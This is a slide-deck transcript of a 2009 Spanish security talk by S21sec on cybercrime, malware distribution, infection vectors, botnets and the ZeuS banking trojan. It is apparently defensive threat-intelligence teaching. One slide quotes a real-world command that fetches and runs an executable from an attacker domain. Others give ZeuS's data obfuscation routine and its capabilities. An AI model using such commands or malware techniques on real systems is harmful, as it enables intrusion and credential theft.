cibercrimen fraude y malware mikel gastesi
DESCRIPTION
Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.TRANSCRIPT
![Page 2: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/2.jpg)
Confidencialidad
La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización.
Pág. 2
![Page 3: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/3.jpg)
Índice
Pág. 3
Introducción - ¿Cibercrimen?EvoluciónDistribuciónInfecciónBotnets• ZeuS/Zbot
Money, money, money
![Page 4: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/4.jpg)
INTRODUCCIÓN - ¿CIBERCRIMEN?
Pág. 4
![Page 5: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/5.jpg)
¿CIBERCRIMEN?
![Page 6: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/6.jpg)
EVOLUCIÓN (de la mentalidad)
![Page 7: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/7.jpg)
EVOLUCION
1 persona• Ataques dirigidos• Recursos limitados
Grupos profesionales• Ataques indiscriminados/masivos• Muchos recursos técnicos
![Page 8: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/8.jpg)
EVOLUCIÓN
Cambio de objetivos
Inicios: Ataques al servidor• Necesidad de pocos recursos• Mayor conciencia de seguridad
Ahora: Ataque a los clientes• Necesidad de manejar mucha
información• Necesidad de una infraestructura
tecnológica• Poca conciencia de seguridad
![Page 9: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/9.jpg)
EVOLUCIÓN
1 servidor• Búsqueda de vulnerabilidades• Atacante trata de acceder al servidor
N clientes• Vulnerabilidades conocidas• Victima accede al vector de infección• ¿Phishing? → Malware!!!
![Page 10: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/10.jpg)
DISTRIBUCIÓN
![Page 11: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/11.jpg)
DISTRIBUCIÓN
El malware acude a la víctima• SPAM
• Búsqueda y robo de contactos• P2P• Ingeniería social• Descargas con “regalo”
![Page 12: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/12.jpg)
EJ. SPAM
![Page 13: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/13.jpg)
EJ. SPAM
![Page 14: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/14.jpg)
DISTRIBUCIÓN
La víctima acude al malware• Páginas fraudulentas
• Falsos antivirus• Falsas páginas de vídeos
• Páginas comprometidas• Páginas legítimas atacas
indiscriminadamente
![Page 15: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/15.jpg)
EJ. FAKE AV
![Page 16: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/16.jpg)
EJ. FAKE AV
![Page 17: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/17.jpg)
DISTRIBUCIÓN
Página comprometida, ¿cómo?• Nine ball: 40000 páginas
comprometidas• Cuentas FTP• Diccionario/Brute force• SQL injection• RFI• Exploits recientes, 0-days
![Page 18: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/18.jpg)
SQL INJECTION MASIVO
![Page 19: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/19.jpg)
INFECCIÓN
![Page 20: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/20.jpg)
INFECCIÓN
![Page 21: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/21.jpg)
INFECCIÓN
Software vulnerable• Sistema Operativo• Navegador• Complementos
• Flash• PDF...
TODO programa que interactúe con el exterior es una POSIBLE víctima.
![Page 22: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/22.jpg)
UNAS ESTADÍSTICAS... [secunia]
![Page 23: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/23.jpg)
INFECCIÓN
![Page 24: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/24.jpg)
INFECCIÓN
Víctima “vulnerable”• Ejecución de ficheros adjuntos• Doble extensión (.doc______.exe)
Confianza en la página• Codecs
No siempre se está a salvo teniendo todo el software actualizado• 0-days• Ventana de tiempo de los antivirus
![Page 25: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/25.jpg)
INFECCIÓN
Microsoft DirectShow 0-day (msvidctl.dll)
• Páginas comprometidas
• Inyecta 8oy4t.8866.org/aa/go.jpg
• Muchos exploits, entre ellos el 0day
• 2000, 2003 y XP vulnerables
• Ejecuta: C:\[%programfiles%]\Internet Explorer\iexplore.exe "http://milllk.com/wm/svchost.exe"
• Detectado por solamente por 2 AV (VirusTotal)
• Por ahora, v0.1http://www.securityfocus.com/bid/35558http://www.csis.dk/en/news/news.asp?tekstID=799http://www.microsoft.com/technet/security/advisory/972890.mspx
![Page 26: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/26.jpg)
INFECCIÓN
La cadena es tan fuerte como el eslabón más débil
![Page 27: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/27.jpg)
BOTNETS
![Page 28: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/28.jpg)
BOTNETS
![Page 29: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/29.jpg)
BOTNETS
![Page 30: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/30.jpg)
BOTNETS
Uso:• Proxy• Ataques DdoS• Obtención de credenciales• Hosting• SPAM• Supercomputadora• ...
![Page 31: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/31.jpg)
BOTNETS
No solo PCsBotnets ocultas tras Bullet-proof ISP• No responden a avisos de abuso• Alojan paneles de control• Alojan vectores de infección y
malware• Fraudulento
![Page 32: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/32.jpg)
TROYANOS BANCARIOS - ZeuS
![Page 33: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/33.jpg)
TROYANOS BANCARIOS
SilenciososDistribución masivaBotnetRobar credencialesMitB¿Por qué no más? ¡Es gratis!• Control de la máquina• Proxy• …
Programado por humanos• Parámetros• Idioma, user-agent...
![Page 34: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/34.jpg)
TROYANOS BANCARIOS
Actores• Sinowal
• Torpig• Buena ocultación• Generación de dominios mediante
algoritmo• Arrestos
• BankPatch• MitB
• ZeuS• Más sencillo• Ocultación user-mode• ¡El rey del mambo!
![Page 35: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/35.jpg)
ZEUS
Finales 2006
• Simple bot
• ~3000$Principios 2007
• Se hace popular
• ~700$Finales 2007
• Versiones personalizadasMediados 2008
• Vulnerabilidades
• Implementaciones en paralelo2009
• Vulnerabilidades corregidas
• Soporta parcialmente IPv6...
![Page 36: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/36.jpg)
ZEUS – CAMBIOS IMPORTANTES
Corrección de bugs• Mal saneamiento de parámetros
• Escritura de ficheros• ¡Guerra!
10-12-2008 → RC4• Local data requests to the server
and the configuration file can be encrypted with RC4 key depending on your choice
![Page 37: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/37.jpg)
ZEUS
![Page 38: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/38.jpg)
ZEUS
Distribución• SPAM
• Facturas• E-cards• Michael Jackson
• Kits de exploits
![Page 39: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/39.jpg)
ZEUS - CARACTERÍSTICAS
BotActualización configuraciónActualización del binario/etc/hostsSocks proxyInyección HTMLRedirección HTMLCapturas de pantallaCapturas de teclados virtualesCaptura de credencialesRobo certificadosKillOS
![Page 40: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/40.jpg)
ZEUS - TODO
Compatibility with Windows Vista and Windows 7Improved WinAPI hookingRandom generation of configuration files to avoid generic detectionConsole-based builderVersion supporing 64 bit processorsFull IPv6 supportDetailed statistics on antivirus software and firewalls installed on the infected machines
![Page 41: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/41.jpg)
ZEUS
![Page 42: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/42.jpg)
ZEUS - FICHEROS
1.0.x.x
• ntos.exe
• \wnspoem\audio.dll
• \wnspoem\video.dll……1.2.x.x
• sdra64.exe
• \lowsec\local.ds
• \lowsec\audio.ds¿1.3.x.x?
• bootwindows.exe
• \skype32\win32post.dll
• \skype32\win64post.dll
![Page 43: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/43.jpg)
ZEUS
![Page 44: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/44.jpg)
ZEUS
![Page 45: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/45.jpg)
ZEUS
Config file:• Cifrado con RC4• Update binary• Url C&C server• Advanced configuration• Webfilters• WebFakes• WebInjects
![Page 46: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/46.jpg)
ZEUS
Ficheros de datos• Cifrado RC4 al servidor• Cifrado.
For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
![Page 47: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/47.jpg)
ZEUS - C&C
![Page 48: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/48.jpg)
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
![Page 49: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/49.jpg)
ZEUS - C&C
Instalación: • Siguiente → Siguiente → Final
PHP + mysql • O ficheros
Generador de ficheros de configuración y binarios.Opciones del panel de control
![Page 50: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/50.jpg)
Zeus – C&C
Opciones• Botnet : Bots online• Botnet : Comandos remotos• Logs : Búsqueda• Logs : Ficheros subidos• System : Perfil• System : Opciones
![Page 51: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/51.jpg)
ZEUS
![Page 52: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/52.jpg)
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
![Page 53: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/53.jpg)
ZEUS
KillOS• HKEY_CURRENT_USER• HKEY_LOCAL_MACHINE\software• HKEL_LOCAL_MACHINE\system• Trata de llenar de ceros toda la
memoria.• BSOD
![Page 54: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/54.jpg)
MONEY, MONEY, MONEY
![Page 55: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/55.jpg)
LUCRO
Crear malware y venderloCrear botnet y alquilarlaObtención de credenciales y venderlasObtención de dinero gracias a las credenciales
![Page 56: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/56.jpg)
LUCRO
![Page 57: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/57.jpg)
LUCRO
![Page 58: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/58.jpg)
LUCRO
![Page 59: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/59.jpg)
LUCRO
![Page 60: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/60.jpg)
LUCRO
TransferenciasCompra de bienes• Físicos• Virtuales
Subastas...deja volar tu imaginación
![Page 61: Cibercrimen Fraude Y Malware Mikel Gastesi](https://reader033.vdocuments.site/reader033/viewer/2022052620/557adee8d8b42a85648b4ed7/html5/thumbnails/61.jpg)
*[ MUCHAS GRACIAS ]
Pág. 61